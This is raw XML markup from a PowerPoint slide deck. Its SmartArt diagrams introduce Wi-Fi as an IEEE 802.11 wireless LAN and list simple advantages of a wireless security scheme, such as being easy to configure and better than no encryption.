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54" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId16"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="274" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="273" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="264" r:id="rId1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>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="52" d="100"/>
          <a:sy n="52" d="100"/>
        </p:scale>
        <p:origin x="878" y="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E5698A-049E-47BC-A2CB-3D6530A8D8A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0892D8E-1B35-495D-A877-EC93B3942245}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Wi-Fi refers to wireless  local area network (WLAN)  based on IEEE 802.11</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2ABDAE87-2090-4FE7-B06E-B9F63E67D360}" type="parTrans" cxnId="{732FE121-F0D8-4F24-A859-6D6B2058EC72}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96DD0D9A-7180-480F-A2EA-C32E2FECC2EE}" type="sibTrans" cxnId="{732FE121-F0D8-4F24-A859-6D6B2058EC72}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5F86B4F-7465-4EEA-9AAF-35832B5D56B5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>It is widely used technology for wireless communication across a radio channel</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{439ACA9B-487A-4B7F-B3AB-90E17953D09C}" type="parTrans" cxnId="{4BD6C485-F377-482C-88D5-DF97F2C8D0AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{948000C5-BF8F-41D8-9E08-618D8161002B}" type="sibTrans" cxnId="{4BD6C485-F377-482C-88D5-DF97F2C8D0AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99D85021-29E5-445E-81F5-0C7E8B8D6141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Device such as personal computer , video-game console , smartphone , etc. use to connect to  a network resource such as the internet via wireless network  access point.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33906382-5BA5-4FDA-9446-C6EAF105370D}" type="parTrans" cxnId="{82C12A0E-7CDE-4053-8D32-3DDF298D9093}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3770550-FE93-466E-8D62-F5B3D65B72BB}" type="sibTrans" cxnId="{82C12A0E-7CDE-4053-8D32-3DDF298D9093}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{600196EF-1B0A-4C31-BF28-7F385BD3D5B5}" type="pres">
      <dgm:prSet presAssocID="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{28401A37-DAED-4284-AECF-C26519B63501}" type="pres">
      <dgm:prSet presAssocID="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F5415802-8CE7-4D05-9E54-B38990B72BA2}" type="pres">
      <dgm:prSet presAssocID="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" presName="cycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2E8EBAF-382C-4D1F-AA1A-2F697AEF743B}" type="pres">
      <dgm:prSet presAssocID="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" presName="srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B11881B-C7A2-4D32-A2B4-6A7FE08F6E20}" type="pres">
      <dgm:prSet presAssocID="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" presName="conn" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4ED66394-27E0-49C9-9506-CC77DA0D00D4}" type="pres">
      <dgm:prSet presAssocID="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" presName="extraNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BAD118E2-D595-403A-9735-0772A6F0A95A}" type="pres">
      <dgm:prSet presAssocID="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" presName="dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6B74994-C832-4D3A-9DFF-333B107AD307}" type="pres">
      <dgm:prSet presAssocID="{80892D8E-1B35-495D-A877-EC93B3942245}" presName="text_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52440EFD-937D-42DE-A087-BD846CC43C7B}" type="pres">
      <dgm:prSet presAssocID="{80892D8E-1B35-495D-A877-EC93B3942245}" presName="accent_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FC56351-BFC9-4FA5-A9FC-4574E2939D2B}" type="pres">
      <dgm:prSet presAssocID="{80892D8E-1B35-495D-A877-EC93B3942245}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="0" presStyleCnt="3" custScaleX="98960" custScaleY="75000"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{85DD1057-645B-4F6C-AF92-55518F90EEFB}" type="pres">
      <dgm:prSet presAssocID="{A5F86B4F-7465-4EEA-9AAF-35832B5D56B5}" presName="text_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A7FC17A-AFC9-42C2-AF61-1A40627910D7}" type="pres">
      <dgm:prSet presAssocID="{A5F86B4F-7465-4EEA-9AAF-35832B5D56B5}" presName="accent_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{06D6C753-C024-4E41-9D85-D4CB60BE2846}" type="pres">
      <dgm:prSet presAssocID="{A5F86B4F-7465-4EEA-9AAF-35832B5D56B5}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="1" presStyleCnt="3" custScaleX="93300" custScaleY="82500"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E575A6E1-FEB2-4B4B-AF99-50C91EBC1DB1}" type="pres">
      <dgm:prSet presAssocID="{99D85021-29E5-445E-81F5-0C7E8B8D6141}" presName="text_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D56E3733-D9CE-417A-818E-4F4487CA29CC}" type="pres">
      <dgm:prSet presAssocID="{99D85021-29E5-445E-81F5-0C7E8B8D6141}" presName="accent_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB9DA43C-6DB5-4471-95D9-C6C647C685F9}" type="pres">
      <dgm:prSet presAssocID="{99D85021-29E5-445E-81F5-0C7E8B8D6141}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="2" presStyleCnt="3" custScaleX="106460" custScaleY="82500"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{652E540C-8D3F-4B8D-8C92-90540210D796}" type="presOf" srcId="{96DD0D9A-7180-480F-A2EA-C32E2FECC2EE}" destId="{5B11881B-C7A2-4D32-A2B4-6A7FE08F6E20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{82C12A0E-7CDE-4053-8D32-3DDF298D9093}" srcId="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" destId="{99D85021-29E5-445E-81F5-0C7E8B8D6141}" srcOrd="2" destOrd="0" parTransId="{33906382-5BA5-4FDA-9446-C6EAF105370D}" sibTransId="{A3770550-FE93-466E-8D62-F5B3D65B72BB}"/>
    <dgm:cxn modelId="{8A1B6917-5828-48C8-B5D3-A2B80C91D2BB}" type="presOf" srcId="{A5F86B4F-7465-4EEA-9AAF-35832B5D56B5}" destId="{85DD1057-645B-4F6C-AF92-55518F90EEFB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{732FE121-F0D8-4F24-A859-6D6B2058EC72}" srcId="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" destId="{80892D8E-1B35-495D-A877-EC93B3942245}" srcOrd="0" destOrd="0" parTransId="{2ABDAE87-2090-4FE7-B06E-B9F63E67D360}" sibTransId="{96DD0D9A-7180-480F-A2EA-C32E2FECC2EE}"/>
    <dgm:cxn modelId="{B22C595D-FB6E-4924-B5C6-BE4A9F2BE85A}" type="presOf" srcId="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" destId="{600196EF-1B0A-4C31-BF28-7F385BD3D5B5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{FD40D876-3AD8-4033-B0AE-8189FB79AC7B}" type="presOf" srcId="{99D85021-29E5-445E-81F5-0C7E8B8D6141}" destId="{E575A6E1-FEB2-4B4B-AF99-50C91EBC1DB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{4BD6C485-F377-482C-88D5-DF97F2C8D0AC}" srcId="{F3E5698A-049E-47BC-A2CB-3D6530A8D8A2}" destId="{A5F86B4F-7465-4EEA-9AAF-35832B5D56B5}" srcOrd="1" destOrd="0" parTransId="{439ACA9B-487A-4B7F-B3AB-90E17953D09C}" sibTransId="{948000C5-BF8F-41D8-9E08-618D8161002B}"/>
    <dgm:cxn modelId="{B15F7BD3-C709-47CD-8445-90512D5D3D7C}" type="presOf" srcId="{80892D8E-1B35-495D-A877-EC93B3942245}" destId="{D6B74994-C832-4D3A-9DFF-333B107AD307}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9D290443-5661-43A7-A7E0-BB9D9F77D551}" type="presParOf" srcId="{600196EF-1B0A-4C31-BF28-7F385BD3D5B5}" destId="{28401A37-DAED-4284-AECF-C26519B63501}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{DDCC0743-BAF5-43F1-B201-F25F5FFF6C83}" type="presParOf" srcId="{28401A37-DAED-4284-AECF-C26519B63501}" destId="{F5415802-8CE7-4D05-9E54-B38990B72BA2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{BA5E1E12-515B-49BB-B006-0F0DDA6C36BC}" type="presParOf" srcId="{F5415802-8CE7-4D05-9E54-B38990B72BA2}" destId="{E2E8EBAF-382C-4D1F-AA1A-2F697AEF743B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9FAD9C54-E720-4313-ABFA-FA9251028431}" type="presParOf" srcId="{F5415802-8CE7-4D05-9E54-B38990B72BA2}" destId="{5B11881B-C7A2-4D32-A2B4-6A7FE08F6E20}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9AC50ECE-E522-4122-9531-4C5F9D03E89E}" type="presParOf" srcId="{F5415802-8CE7-4D05-9E54-B38990B72BA2}" destId="{4ED66394-27E0-49C9-9506-CC77DA0D00D4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{E5BD43E5-1A4C-4401-9C22-F1D8F0E87126}" type="presParOf" srcId="{F5415802-8CE7-4D05-9E54-B38990B72BA2}" destId="{BAD118E2-D595-403A-9735-0772A6F0A95A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{4C4466F8-BFF5-4F46-8821-8E22CF131418}" type="presParOf" srcId="{28401A37-DAED-4284-AECF-C26519B63501}" destId="{D6B74994-C832-4D3A-9DFF-333B107AD307}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9E1128B3-4A03-41FE-BC5D-91CC19B51E0E}" type="presParOf" srcId="{28401A37-DAED-4284-AECF-C26519B63501}" destId="{52440EFD-937D-42DE-A087-BD846CC43C7B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0F9B1523-C98F-4633-8185-A25408E9B510}" type="presParOf" srcId="{52440EFD-937D-42DE-A087-BD846CC43C7B}" destId="{3FC56351-BFC9-4FA5-A9FC-4574E2939D2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{41706B42-0F43-4E88-B64B-F600F65591D8}" type="presParOf" srcId="{28401A37-DAED-4284-AECF-C26519B63501}" destId="{85DD1057-645B-4F6C-AF92-55518F90EEFB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{6BAE9388-A79C-48AD-9677-9747802BB2DA}" type="presParOf" srcId="{28401A37-DAED-4284-AECF-C26519B63501}" destId="{0A7FC17A-AFC9-42C2-AF61-1A40627910D7}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{892E75C6-5CA4-414C-8881-05A8AA91008B}" type="presParOf" srcId="{0A7FC17A-AFC9-42C2-AF61-1A40627910D7}" destId="{06D6C753-C024-4E41-9D85-D4CB60BE2846}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0CA16849-C5F5-4007-AC2B-24B63C7653D4}" type="presParOf" srcId="{28401A37-DAED-4284-AECF-C26519B63501}" destId="{E575A6E1-FEB2-4B4B-AF99-50C91EBC1DB1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{5C8B1B69-B98D-414B-9F34-347155935E94}" type="presParOf" srcId="{28401A37-DAED-4284-AECF-C26519B63501}" destId="{D56E3733-D9CE-417A-818E-4F4487CA29CC}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{D6B34C09-7EE0-4C3B-BE46-7DAB6F39BA0E}" type="presParOf" srcId="{D56E3733-D9CE-417A-818E-4F4487CA29CC}" destId="{DB9DA43C-6DB5-4471-95D9-C6C647C685F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13F1DF-5EE0-4F72-B883-1A844FB414A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35BC91E-8782-4F9C-953B-663C1F19EEC0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:noFill/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="3200" dirty="0"/>
            <a:t>Easy to configure</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="5100" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C8F0234-BC7F-4488-834C-F888AC1309A4}" type="parTrans" cxnId="{CAEA0EB7-71D1-42F1-BA6D-83F095E80538}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{578928AD-37C2-4949-A48E-835B22ED1E05}" type="sibTrans" cxnId="{CAEA0EB7-71D1-42F1-BA6D-83F095E80538}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED67F555-87C6-4909-A537-0F09561C0CBE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>2.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D66D9A30-AE50-4E53-97FF-E7E050EA129A}" type="parTrans" cxnId="{EF3DB484-A600-475A-B25E-EFEB33F0FA86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8786AF9B-4019-45A0-90D4-9F0A40B2524A}" type="sibTrans" cxnId="{EF3DB484-A600-475A-B25E-EFEB33F0FA86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A2C11E0-677F-4DA1-ACDA-ABBF52799180}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>3.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4A2D848-0C9F-4CE2-A865-3E77506D089C}" type="parTrans" cxnId="{9BE72FB3-2CCF-4511-AF03-669604D8374B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6533B6A-8889-4DC6-BA83-796FC803BA94}" type="sibTrans" cxnId="{9BE72FB3-2CCF-4511-AF03-669604D8374B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A9C3EA4-B8EE-4979-8987-B21B672AC41A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:noFill/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="3100" dirty="0"/>
            <a:t>Widely supported security system.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB363E53-40D3-4A8F-84CF-FA0D7ACBE8D1}" type="parTrans" cxnId="{59ECE22A-6CF3-4951-BB11-268B3E4CCC59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F36E0071-8AB0-4EE3-AAB8-189E378D2673}" type="sibTrans" cxnId="{59ECE22A-6CF3-4951-BB11-268B3E4CCC59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D16C108D-C435-4295-97E3-0826C7F8A7FC}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:noFill/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="3100" dirty="0"/>
            <a:t>Secures your wireless network better than no encryption at all.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="3100" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55804A3F-8103-4C8C-B77B-DA37F4F07131}" type="parTrans" cxnId="{3D366117-F89C-41FB-8824-15C8CE118097}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC4242D4-01A0-4804-B882-FC09ECB435D1}" type="sibTrans" cxnId="{3D366117-F89C-41FB-8824-15C8CE118097}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7309945B-E406-4769-B292-7E746E74FE47}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>1.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C348865-41EF-4659-8B60-A802EEF04AFD}" type="sibTrans" cxnId="{F425790C-5962-448A-962A-CAF34575CEFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDC8653B-529B-447A-A921-E669FEF990CA}" type="parTrans" cxnId="{F425790C-5962-448A-962A-CAF34575CEFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0442719-D14D-4A1A-B80D-3828F551DFA2}" type="pres">
      <dgm:prSet presAssocID="{8913F1DF-5EE0-4F72-B883-1A844FB414A9}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EEF2578-7AC8-4A68-9290-D4F6E1703B6B}" type="pres">
      <dgm:prSet presAssocID="{7309945B-E406-4769-B292-7E746E74FE47}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E1A2270-E771-4655-B665-1B486693EC5B}" type="pres">
      <dgm:prSet presAssocID="{7309945B-E406-4769-B292-7E746E74FE4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B7BE075-5BC7-431C-9477-A834CBBDEAC0}" type="pres">
      <dgm:prSet presAssocID="{7309945B-E406-4769-B292-7E746E74FE47}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="178" custLinFactNeighborY="-61">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4AA508D8-91DE-49CF-9A3C-0CBB0557F024}" type="pres">
      <dgm:prSet presAssocID="{6C348865-41EF-4659-8B60-A802EEF04AFD}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C2E058B-B9DA-4021-A9EE-4344A77C7374}" type="pres">
      <dgm:prSet presAssocID="{ED67F555-87C6-4909-A537-0F09561C0CBE}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{20A58F3B-DD3F-43A3-875D-4579A8FD7627}" type="pres">
      <dgm:prSet presAssocID="{ED67F555-87C6-4909-A537-0F09561C0CB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02EFA51-8867-4919-B960-1E0796925DBD}" type="pres">
      <dgm:prSet presAssocID="{ED67F555-87C6-4909-A537-0F09561C0CBE}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CB1CBF05-BE69-4A8E-89D0-0866C48C1BCA}" type="pres">
      <dgm:prSet presAssocID="{8786AF9B-4019-45A0-90D4-9F0A40B2524A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8C648400-D281-4E5C-AE4B-F865AE4CBD8D}" type="pres">
      <dgm:prSet presAssocID="{1A2C11E0-677F-4DA1-ACDA-ABBF52799180}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCB0D47D-B3F9-4FE8-84DE-923AEAA1F95C}" type="pres">
      <dgm:prSet presAssocID="{1A2C11E0-677F-4DA1-ACDA-ABBF5279918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9B684CB-CA4C-4031-A719-B38D55EFD2A8}" type="pres">
      <dgm:prSet presAssocID="{1A2C11E0-677F-4DA1-ACDA-ABBF52799180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425790C-5962-448A-962A-CAF34575CEFE}" srcId="{8913F1DF-5EE0-4F72-B883-1A844FB414A9}" destId="{7309945B-E406-4769-B292-7E746E74FE47}" srcOrd="0" destOrd="0" parTransId="{DDC8653B-529B-447A-A921-E669FEF990CA}" sibTransId="{6C348865-41EF-4659-8B60-A802EEF04AFD}"/>
